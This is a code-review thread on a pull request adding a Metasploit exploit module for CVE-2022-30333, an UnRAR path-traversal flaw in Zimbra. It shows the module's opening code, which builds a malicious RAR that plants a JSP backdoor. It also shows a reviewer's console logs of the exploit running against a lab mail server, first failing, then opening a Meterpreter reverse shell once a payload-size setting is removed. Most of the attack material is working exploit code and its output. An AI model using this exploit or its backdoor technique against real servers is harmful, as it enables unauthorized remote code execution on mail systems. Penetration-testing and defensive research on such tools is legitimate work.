modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Format::RarSymlinkPathTraversal
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',
+        'Description' => %q{
+          This module creates a RAR file that can be emailed to a Zimbra server
+          to exploit CVE-2022-30333. If successful, it plants a JSP-based
+          backdoor in the public web directory, then executes that backdoor.
+
+          The core vulnerability is a path-traversal issue in unRAR that can
+          extract an arbitrary file to an arbitrary location on a Linux system.
+
+          This issue is exploitable on the following versions of Zimbra, provided
+          UnRAR version 6.11 or earlier is installed:
+
+          * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+          * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+        },
+        'Author' => [
+          'Simon Scannell', # Discovery / initial disclosure (via Sonar)
+          'Ron Bowes', # Analysis, PoC, and module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-30333'],
+          ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],
+          ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],
+          ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Payload' => {
+          # The RAR file has 4096 bytes of room. The payload is hex-encoded, and
+          # the JSP template is ~1624 bytes long (with worst possible RNG). We
+          # could create a larger template if desired, but it's a pain because
+          # we have to do file carving
+          'Space' => (4096 / 2) - 1700
```

Comment:
It looks like the `Space` setting causes the default Meterpreter payload to fail on my environment. The issue https://github.com/rapid7/metasploit-framework/issues/16827 you mentioned seems to be related:
```
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit lhost=192.168.0.2 rhosts=192.168.0.23 verbose=true
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Encoding the payload as a .jsp file
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > [*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/mozok.jsp
[+] payload.rar stored at /home/msfuser/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/mozok.jsp...
[*] Trying to trigger the backdoor @ public/mozok.jsp...
[*] Trying to trigger the backdoor @ public/mozok.jsp...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[*] 192.168.0.23 - Meterpreter session 1 closed.  Reason: Died
[*] Trying to trigger the backdoor @ public/mozok.jsp...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[*] 192.168.0.23 - Meterpreter session 2 closed.  Reason: Died
[*] Trying to trigger the backdoor @ public/mozok.jsp...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[*] 192.168.0.23 - Meterpreter session 3 closed.  Reason: Died
```
Removing `Space` fixed it:
```
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit lhost=192.168.0.2 rhosts=192.168.0.23 verbose=true
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Encoding the payload as a .jsp file
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > [*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gcsqvlfg.jsp
[+] payload.rar stored at /home/msfuser/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/gcsqvlfg.jsp...
[*] Trying to trigger the backdoor @ public/gcsqvlfg.jsp...
[*] Trying to trigger the backdoor @ public/gcsqvlfg.jsp...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gcsqvlfg.jsp
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.23:53980) at 2022-08-03 14:58:34 +0200

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: zimbra
meterpreter > sysinfo
Computer     : mail.donotexistdomain.foo
OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

Reply:
Oh interesting! I thought that created a too-big payload originally, but doesn't seem to now. I tested and it works fine!